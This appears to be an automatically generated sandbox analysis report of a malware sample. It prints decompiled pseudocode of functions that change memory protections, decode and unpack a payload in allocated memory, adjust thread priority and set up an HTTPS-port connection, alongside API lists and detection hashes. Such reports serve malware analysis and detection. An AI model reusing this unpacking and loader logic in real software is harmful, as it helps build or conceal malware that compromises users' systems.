                                                                                                                                                                                                                                0x00a92a1e
                                                                                                                                                                                                                                0x00a92a1e
                                                                                                                                                                                                                                0x00a929b5
                                                                                                                                                                                                                                0x00a92a30
                                                                                                                                                                                                                                0x00a92a30
                                                                                                                                                                                                                                0x00a92a32
                                                                                                                                                                                                                                0x00a92a37
                                                                                                                                                                                                                                0x00a92a39
                                                                                                                                                                                                                                0x00a92a39
                                                                                                                                                                                                                                0x00a92a44

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04FD9370,00000000,?,747DF710,00000000,747DF730), ref: 00A92981
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04FD93A8,?,00000000,30314549,00000014,004F0053,04FD9364), ref: 00A92A1E
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A9A080), ref: 00A92A30
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3298025750-1536154274
                                                                                                                                                                                                                                • Opcode ID: 74e4ae681c3ae6fe95900d2667307f39d0422f9c7e7671d6bbbd56833b649adf
                                                                                                                                                                                                                                • Instruction ID: 217d1a94232e183a1cd730c7350cffa3e94420ca369e7277171ffd0340625e97
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74e4ae681c3ae6fe95900d2667307f39d0422f9c7e7671d6bbbd56833b649adf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF316F72B00118BFEF21DBD4DE85EEA7BFCEB44740F1400AAB50097061DA70AE4A9B60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A61B7F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E00A61B7F(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0xa641c0;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}












                                                                                                                                                                                                                                0x00a61b89
                                                                                                                                                                                                                                0x00a61b96
                                                                                                                                                                                                                                0x00a61b9c
                                                                                                                                                                                                                                0x00a61ba8
                                                                                                                                                                                                                                0x00a61bb8
                                                                                                                                                                                                                                0x00a61bba
                                                                                                                                                                                                                                0x00a61bc2
                                                                                                                                                                                                                                0x00a61c57
                                                                                                                                                                                                                                0x00a61c5e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61bc8
                                                                                                                                                                                                                                0x00a61bc8
                                                                                                                                                                                                                                0x00a61bc8
                                                                                                                                                                                                                                0x00a61bcc
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61bd8
                                                                                                                                                                                                                                0x00a61bdc
                                                                                                                                                                                                                                0x00a61c00
                                                                                                                                                                                                                                0x00a61c04
                                                                                                                                                                                                                                0x00a61c18
                                                                                                                                                                                                                                0x00a61c18
                                                                                                                                                                                                                                0x00a61c1e
                                                                                                                                                                                                                                0x00a61c2d
                                                                                                                                                                                                                                0x00a61c31
                                                                                                                                                                                                                                0x00a61c39
                                                                                                                                                                                                                                0x00a61c39
                                                                                                                                                                                                                                0x00a61c41
                                                                                                                                                                                                                                0x00a61c44
                                                                                                                                                                                                                                0x00a61c51
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61c51
                                                                                                                                                                                                                                0x00a61c0c
                                                                                                                                                                                                                                0x00a61c10
                                                                                                                                                                                                                                0x00a61c16
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61c16
                                                                                                                                                                                                                                0x00a61be4
                                                                                                                                                                                                                                0x00a61be8
                                                                                                                                                                                                                                0x00a61bf2
                                                                                                                                                                                                                                0x00a61bea
                                                                                                                                                                                                                                0x00a61bea
                                                                                                                                                                                                                                0x00a61bea
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61be8
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00A61BB8
                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00A61C2D
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A61C33
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 1469625949-1084903527
                                                                                                                                                                                                                                • Opcode ID: 7ddb87e2d2b5dc2fa3465860aaae2bf69fa3010cab9a7f8bc019a8c7ced00492
                                                                                                                                                                                                                                • Instruction ID: 47cb944846775e6e98224d85456c33ef46aee05a5f46e1f8b741fdcf687a69f5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ddb87e2d2b5dc2fa3465860aaae2bf69fa3010cab9a7f8bc019a8c7ced00492
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8216B7190020AEFCB14CF95C881ABEFBF4FF08345F454459D202D7018E7B4AAA9CB98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A617CE, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                                                			E00A617CE(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				unsigned int _v24;
				intOrPtr _v28;
				char _v32;
				void* _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v52;
				signed int _v56;
				intOrPtr _t52;
				void* _t59;
				void* _t63;
				signed int _t69;
				void* _t71;
				intOrPtr _t72;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr* _t86;
				intOrPtr _t89;
				intOrPtr _t91;
				void* _t92;
				intOrPtr _t94;

				_t91 =  *0xa641b0;
				_t52 = E00A61917(_t91,  &_v32,  &_v24);
				_v28 = _t52;
				if(_t52 == 0) {
					asm("sbb ebx, ebx");
					_t69 =  ~( ~(_v24 & 0x00000fff)) + (_v24 >> 0xc);
					_t92 = _t91 + _v32;
					_v44 = _t92;
					_t59 = VirtualAlloc(0, _t69 << 0xc, 0x3000, 4); // executed
					_t71 = _t59;
					_v36 = _t71;
					if(_t71 == 0) {
						_v28 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t69 <= 0) {
							_t72 =  *0xa641c0;
						} else {
							_t84 = _a4;
							_v12 = _t92;
							_v12 = _v12 - _t71;
							_t16 = _t84 + 0xa651a7; // 0x3220a9c2
							_t63 = _t59 - _t92 + _t16;
							_v20 = _t71;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_v16 = 0x400;
								_t94 = 0;
								_t86 = _v20;
								_v40 = (_v56 ^ _v52) - _v8 + _v32 + _a4 - 1;
								do {
									_t79 =  *((intOrPtr*)(_v12 + _t86));
									_t89 = _t79;
									if(_t79 == 0) {
										_v16 = 1;
									} else {
										 *_t86 = _t79 + _t94 - _v40;
										_t94 = _t89;
										_t86 = _t86 + 4;
									}
									_t33 =  &_v16;
									 *_t33 = _v16 - 1;
								} while ( *_t33 != 0);
								_v20 = _v20 + 0x1000;
								_t72 =  *((intOrPtr*)(_t63 + 0xc)) -  *((intOrPtr*)(_t63 + 8)) +  *((intOrPtr*)(_t63 + 4));
								_v8 = _v8 + 1;
								 *0xa641c0 = _t72;
							} while (_v8 < _t69);
						}
						if(_t72 != 0x69b25f44) {
							_v28 = 9;
						} else {
							memcpy(_v44, _v36, _v24);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v28;
			}




























                                                                                                                                                                                                                                0x00a617d5
                                                                                                                                                                                                                                0x00a617e5
                                                                                                                                                                                                                                0x00a617ea
                                                                                                                                                                                                                                0x00a617ef
                                                                                                                                                                                                                                0x00a61804
                                                                                                                                                                                                                                0x00a6180b
                                                                                                                                                                                                                                0x00a61810
                                                                                                                                                                                                                                0x00a61821
                                                                                                                                                                                                                                0x00a61824
                                                                                                                                                                                                                                0x00a6182a
                                                                                                                                                                                                                                0x00a6182c
                                                                                                                                                                                                                                0x00a61831
                                                                                                                                                                                                                                0x00a61907
                                                                                                                                                                                                                                0x00a61837
                                                                                                                                                                                                                                0x00a61837
                                                                                                                                                                                                                                0x00a6183d
                                                                                                                                                                                                                                0x00a618cd
                                                                                                                                                                                                                                0x00a61843
                                                                                                                                                                                                                                0x00a61843
                                                                                                                                                                                                                                0x00a61848
                                                                                                                                                                                                                                0x00a6184b
                                                                                                                                                                                                                                0x00a6184e
                                                                                                                                                                                                                                0x00a6184e
                                                                                                                                                                                                                                0x00a61855
                                                                                                                                                                                                                                0x00a61859
                                                                                                                                                                                                                                0x00a61864
                                                                                                                                                                                                                                0x00a61865
                                                                                                                                                                                                                                0x00a61866
                                                                                                                                                                                                                                0x00a6186d
                                                                                                                                                                                                                                0x00a6187a
                                                                                                                                                                                                                                0x00a61880
                                                                                                                                                                                                                                0x00a61883
                                                                                                                                                                                                                                0x00a61886
                                                                                                                                                                                                                                0x00a61889
                                                                                                                                                                                                                                0x00a6188c
                                                                                                                                                                                                                                0x00a61890
                                                                                                                                                                                                                                0x00a618a0
                                                                                                                                                                                                                                0x00a61892
                                                                                                                                                                                                                                0x00a61897
                                                                                                                                                                                                                                0x00a61899
                                                                                                                                                                                                                                0x00a6189b
                                                                                                                                                                                                                                0x00a6189b
                                                                                                                                                                                                                                0x00a618a7
                                                                                                                                                                                                                                0x00a618a7
                                                                                                                                                                                                                                0x00a618a7
                                                                                                                                                                                                                                0x00a618b2
                                                                                                                                                                                                                                0x00a618b9
                                                                                                                                                                                                                                0x00a618bc
                                                                                                                                                                                                                                0x00a618bf
                                                                                                                                                                                                                                0x00a618c5
                                                                                                                                                                                                                                0x00a618ca
                                                                                                                                                                                                                                0x00a618d9
                                                                                                                                                                                                                                0x00a618ee
                                                                                                                                                                                                                                0x00a618db
                                                                                                                                                                                                                                0x00a618e4
                                                                                                                                                                                                                                0x00a618e9
                                                                                                                                                                                                                                0x00a618ff
                                                                                                                                                                                                                                0x00a618ff
                                                                                                                                                                                                                                0x00a6190e
                                                                                                                                                                                                                                0x00a61914

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000030,?,00000000,00000000,?,?,?,?,?,?,?,00A615E1), ref: 00A61824
                                                                                                                                                                                                                                • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,?,?,00A615E1,00000000,00000030,747863F0,00000000), ref: 00A618E4
                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00A618FF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                • String ID: Oct 27 2021
                                                                                                                                                                                                                                • API String ID: 4010158826-1702575778
                                                                                                                                                                                                                                • Opcode ID: 30d950d3bc96d7c561c4590dc4d048734b91767bb6ea1dd95001bf636ea9910e
                                                                                                                                                                                                                                • Instruction ID: cfb28bbf46c212578aaa9405aa31408a440583ababaf5ced7bf0ae846576b19e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30d950d3bc96d7c561c4590dc4d048734b91767bb6ea1dd95001bf636ea9910e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9415C72E00219DFDF04CF94D990BAEBBB5FF09314F154169E911B7240D7B1AA45CB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A94A6A, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(80000002), ref: 00A94AC7
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00A948F5), ref: 00A94B0B
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A94B1F
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A94B2D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                                                • Opcode ID: 293c574e1e2bd769a9345d15e4c8170fff58887fe5e47a02be7df2fd91228a74
                                                                                                                                                                                                                                • Instruction ID: 0b40ccfdffaa1e25e5f1006c1704311b78af65e33d14310d62de88059ae989a8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 293c574e1e2bd769a9345d15e4c8170fff58887fe5e47a02be7df2fd91228a74
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB310B76A00209EFCB05DFD8D884DAE7BB9FF18340B20842EE5059B251DB70DA86CB65
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A61EB4, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E00A61EB4(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E00A6156C(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                                                                                                                                                                                                                0x00a61ebd
                                                                                                                                                                                                                                0x00a61ec2
                                                                                                                                                                                                                                0x00a61ed0
                                                                                                                                                                                                                                0x00a61ed5
                                                                                                                                                                                                                                0x00a61ed5
                                                                                                                                                                                                                                0x00a61edb
                                                                                                                                                                                                                                0x00a61ee0
                                                                                                                                                                                                                                0x00a61ee4
                                                                                                                                                                                                                                0x00a61ee8
                                                                                                                                                                                                                                0x00a61ee8
                                                                                                                                                                                                                                0x00a61ef2
                                                                                                                                                                                                                                0x00a61efb

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00A61EB7
                                                                                                                                                                                                                                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 00A61EC2
                                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 00A61ED5
                                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 00A61EE8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1452675757-0
                                                                                                                                                                                                                                • Opcode ID: 85beb2d264fa86198f7ae37c80d830f655340271cec1558f250063a8513bd111
                                                                                                                                                                                                                                • Instruction ID: 52d6ceba904669adbd752bdff4162bb8de5b9fb6da3cf1e4e462d1b6093d95d5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85beb2d264fa86198f7ae37c80d830f655340271cec1558f250063a8513bd111
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBE092323062112BAA11AB695C84D7BBA7CEF923317060335FA21922E0CB91CD0789A5
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A97648, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 23%
                                                                                                                                                                                                                                			E00A97648(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _t34;
				long _t36;
				unsigned int _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t69;

				_t66 = __esi;
				_t63 = E00A93037(_t34, _a4);
				if(_t63 == 0) {
					L18:
					_t36 = GetLastError();
				} else {
					_t37 = GetVersion();
					_t69 = _t37 - 6;
					if(_t69 > 0) {
						L5:
						_a4 = 4;
					} else {
						if(_t69 != 0) {
							L4:
							_a4 = 0;
						} else {
							_t37 = _t37 >> 8;
							if(_t37 > 2) {
								goto L5;
							} else {
								goto L4;
							}
						}
					}
					__imp__(_t63, _a4, 0, 0, 0); // executed
					 *(_t66 + 0x10) = _t37;
					_t38 = E00A953BB(_t63);
					if( *(_t66 + 0x10) == 0) {
						goto L18;
					} else {
						_t39 = E00A93037(_t38,  *_t66);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L18;
						} else {
							_t65 = __imp__; // 0x7021f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
								_t40 = E00A953BB(_v8);
								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x800100;
									_t56 = E00A93037(_t40,  *((intOrPtr*)(_t66 + 4)));
									if(_t56 == 0) {
										goto L18;
									} else {
										_t42 =  *0xa9d2e0; // 0x453a5a8
										_t19 = _t42 + 0xa9e758; // 0x450047
										_t43 = _t19;
										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
										E00A953BB(_t56);
										_t45 =  *((intOrPtr*)(_t66 + 0x18));
										if(_t45 == 0) {
											goto L18;
										} else {
											_t57 = 4;
											_v12 = _t57;
											__imp__(_t45, 0x1f,  &_a4,  &_v12);
											if(_t45 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
											}
											_push(_t57);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t66 + 0x18)));
											if( *_t65() == 0) {
												goto L18;
											} else {
												_push(_t57);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t66 + 0x18)));
												if( *_t65() == 0) {
													goto L18;
												} else {
													_t36 = 0;
												}
											}
										}
									}
								}
							} else {
								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
								if(_t39 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t36;
			}




















                                                                                                                                                                                                                                0x00a97648
                                                                                                                                                                                                                                0x00a97657
                                                                                                                                                                                                                                0x00a9765d
                                                                                                                                                                                                                                0x00a9778e
                                                                                                                                                                                                                                0x00a9778e
                                                                                                                                                                                                                                0x00a97663
                                                                                                                                                                                                                                0x00a97663
                                                                                                                                                                                                                                0x00a97669
                                                                                                                                                                                                                                0x00a9766b
                                                                                                                                                                                                                                0x00a9767b
                                                                                                                                                                                                                                0x00a9767b
                                                                                                                                                                                                                                0x00a9766d
                                                                                                                                                                                                                                0x00a9766d
                                                                                                                                                                                                                                0x00a97676
                                                                                                                                                                                                                                0x00a97676
                                                                                                                                                                                                                                0x00a9766f
                                                                                                                                                                                                                                0x00a9766f
                                                                                                                                                                                                                                0x00a97674
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a97674
                                                                                                                                                                                                                                0x00a9766d
                                                                                                                                                                                                                                0x00a97689
                                                                                                                                                                                                                                0x00a97690
                                                                                                                                                                                                                                0x00a97693
                                                                                                                                                                                                                                0x00a9769b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a976a1
                                                                                                                                                                                                                                0x00a976a3
                                                                                                                                                                                                                                0x00a976a8
                                                                                                                                                                                                                                0x00a976ad
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a976b3
                                                                                                                                                                                                                                0x00a976b3
                                                                                                                                                                                                                                0x00a976bc
                                                                                                                                                                                                                                0x00a976d3
                                                                                                                                                                                                                                0x00a976df
                                                                                                                                                                                                                                0x00a976e8
                                                                                                                                                                                                                                0x00a976eb
                                                                                                                                                                                                                                0x00a976f3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a976f9
                                                                                                                                                                                                                                0x00a976fc
                                                                                                                                                                                                                                0x00a97708
                                                                                                                                                                                                                                0x00a9770e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a97710
                                                                                                                                                                                                                                0x00a97713
                                                                                                                                                                                                                                0x00a9771c
                                                                                                                                                                                                                                0x00a9771c
                                                                                                                                                                                                                                0x00a97726
                                                                                                                                                                                                                                0x00a9772d
                                                                                                                                                                                                                                0x00a97730
                                                                                                                                                                                                                                0x00a97735
                                                                                                                                                                                                                                0x00a9773a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9773c
                                                                                                                                                                                                                                0x00a9773e
                                                                                                                                                                                                                                0x00a9774a
                                                                                                                                                                                                                                0x00a9774d
                                                                                                                                                                                                                                0x00a97755
                                                                                                                                                                                                                                0x00a97757
                                                                                                                                                                                                                                0x00a97768
                                                                                                                                                                                                                                0x00a97768
                                                                                                                                                                                                                                0x00a9776a
                                                                                                                                                                                                                                0x00a9776e
                                                                                                                                                                                                                                0x00a9776f
                                                                                                                                                                                                                                0x00a97771
                                                                                                                                                                                                                                0x00a97778
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9777a
                                                                                                                                                                                                                                0x00a9777a
                                                                                                                                                                                                                                0x00a9777e
                                                                                                                                                                                                                                0x00a9777f
                                                                                                                                                                                                                                0x00a97781
                                                                                                                                                                                                                                0x00a97788
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9778a
                                                                                                                                                                                                                                0x00a9778a
                                                                                                                                                                                                                                0x00a9778a
                                                                                                                                                                                                                                0x00a97788
                                                                                                                                                                                                                                0x00a97778
                                                                                                                                                                                                                                0x00a9773a
                                                                                                                                                                                                                                0x00a9770e
                                                                                                                                                                                                                                0x00a976be
                                                                                                                                                                                                                                0x00a976c9
                                                                                                                                                                                                                                0x00a976cd
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a976cd
                                                                                                                                                                                                                                0x00a976bc
                                                                                                                                                                                                                                0x00a976ad
                                                                                                                                                                                                                                0x00a9769b
                                                                                                                                                                                                                                0x00a97797

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: lstrlen.KERNEL32(?,00000000,04FD9BB8,00000000,00A96F37,04FD9D96,?,?,?,?,?,69B25F44,00000005,00A9D00C), ref: 00A9303E
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: mbstowcs.NTDLL ref: 00A93067
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: memset.NTDLL ref: 00A93079
                                                                                                                                                                                                                                • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,00A92E91,00000000,00000000,04FD9618,?,?,00A921A4,?,04FD9618,0000EA60), ref: 00A97663
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,00A92E91,00000000,00000000,04FD9618,?,?,00A921A4,?,04FD9618,0000EA60), ref: 00A9778E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 4097109750-1701360479
                                                                                                                                                                                                                                • Opcode ID: ebc722039f04ba27c9fcd471a0b894ac4412b5741b4afe152d3be5cdee049b2c
                                                                                                                                                                                                                                • Instruction ID: 225238a6ec548ca9ceb790d2fd4dd339e0532d4f62778acec482f5d1a50b3d86
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebc722039f04ba27c9fcd471a0b894ac4412b5741b4afe152d3be5cdee049b2c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A418D72210609BFDF219FE4CD85EAE7BF9EB04784F10452AF64289060EBB19A45CB70
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

